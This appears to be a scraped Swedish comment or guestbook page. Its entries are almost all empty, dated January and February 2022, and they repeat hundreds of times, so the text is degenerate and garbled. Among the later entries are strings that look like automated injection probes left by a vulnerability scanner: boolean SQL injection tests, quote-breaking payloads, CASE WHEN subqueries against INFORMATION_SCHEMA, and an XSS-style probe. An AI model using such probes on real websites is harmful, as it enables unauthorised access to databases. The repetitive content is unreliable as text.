1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

HmljlC">1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 torsdag, 10 februari 2022:

1 torsdag, 10 februari 2022:

1 torsdag, 10 februari 2022:

1(('(,"",)' torsdag, 10 februari 2022:

1'GKOAqw<'">UeqvOC torsdag, 10 februari 2022:

1) AND 6246=1877 AND (5809=5809 torsdag, 10 februari 2022:

1) AND 6846=6846 AND (1521=1521 torsdag, 10 februari 2022:

1) AND 4763=7864 AND (8956=8956 torsdag, 10 februari 2022:

1 AND 2426=5727 torsdag, 10 februari 2022:

1 AND 6846=6846 torsdag, 10 februari 2022:

1 AND 6219=5373 torsdag, 10 februari 2022:

1 AND 2189=4577-- RWwS torsdag, 10 februari 2022:

1 AND 6846=6846-- PeEz torsdag, 10 februari 2022:

1 AND 8186=6465-- bmlT torsdag, 10 februari 2022:

1') AND 2744=8034 AND ('cxLo'='cxLo torsdag, 10 februari 2022:

1') AND 6846=6846 AND ('oZGJ'='oZGJ torsdag, 10 februari 2022:

1') AND 6157=5523 AND ('XnFk'='XnFk torsdag, 10 februari 2022:

1' AND 1985=1014 AND 'MpsU'='MpsU torsdag, 10 februari 2022:

1' AND 6846=6846 AND 'rYFn'='rYFn torsdag, 10 februari 2022:

1' AND 5766=5334 AND 'YgoN'='YgoN torsdag, 10 februari 2022:

1%' AND 9482=9154 AND '%'=' torsdag, 10 februari 2022:

1%' AND 6846=6846 AND '%'=' torsdag, 10 februari 2022:

1%' AND 2118=1270 AND '%'=' torsdag, 10 februari 2022:

(SELECT (CASE WHEN (3635=7176) THEN 3635 ELSE 3635*(SELECT 3635 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) torsdag, 10 februari 2022:

(SELECT (CASE WHEN (5883=5883) THEN 5883 ELSE 5883*(SELECT 5883 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) torsdag, 10 februari 2022:

(SELECT (CASE WHEN (3049=2809) THEN 3049 ELSE 3049*(SELECT 3049 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) torsdag, 10 februari 2022:

1 torsdag, 10 februari 2022:

1 torsdag, 10 februari 2022:

1 torsdag, 10 februari 2022:

1()".,'(.," torsdag, 10 februari 2022:

1'ZxhgLD<'">XQYcyS torsdag, 10 februari 2022:

1) AND 5040=1298 AND (9077=9077 torsdag, 10 februari 2022:

1) AND 9002=9002 AND (6907=6907 torsdag, 10 februari 2022:

1) AND 1582=8008 AND (1332=1332 torsdag, 10 februari 2022:

1 AND 1853=7625 torsdag, 10 februari 2022:

1 AND 9002=9002 torsdag, 10 februari 2022:

1 AND 8183=4946 torsdag, 10 februari 2022:

1 AND 6312=4340-- TOcY torsdag, 10 februari 2022:

1 AND 9002=9002-- RwZy torsdag, 10 februari 2022:

1 AND 5466=4362-- NLWE torsdag, 10 februari 2022:

1') AND 8835=9964 AND ('Vcrl'='Vcrl torsdag, 10 februari 2022:

1') AND 9002=9002 AND ('PDJR'='PDJR torsdag, 10 februari 2022:

1') AND 5206=7180 AND ('nHaR'='nHaR torsdag, 10 februari 2022:

1' AND 9044=8915 AND 'UvmG'='UvmG torsdag, 10 februari 2022:

1' AND 9002=9002 AND 'AGQI'='AGQI torsdag, 10 februari 2022:

1' AND 5153=5828 AND 'kHwd'='kHwd torsdag, 10 februari 2022:

1%' AND 1421=6503 AND '%'=' torsdag, 10 februari 2022:

1%' AND 9002=9002 AND '%'=' torsdag, 10 februari 2022:

1%' AND 4450=1335 AND '%'=' torsdag, 10 februari 2022:

(SELECT (CASE WHEN (6845=4087) THEN 6845 ELSE 6845*(SELECT 6845 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) torsdag, 10 februari 2022:

(SELECT (CASE WHEN (6308=6308) THEN 6308 ELSE 6308*(SELECT 6308 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) torsdag, 10 februari 2022:

(SELECT (CASE WHEN (1604=5797) THEN 1604 ELSE 1604*(SELECT 1604 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) torsdag, 10 februari 2022:

Skriv en kommentar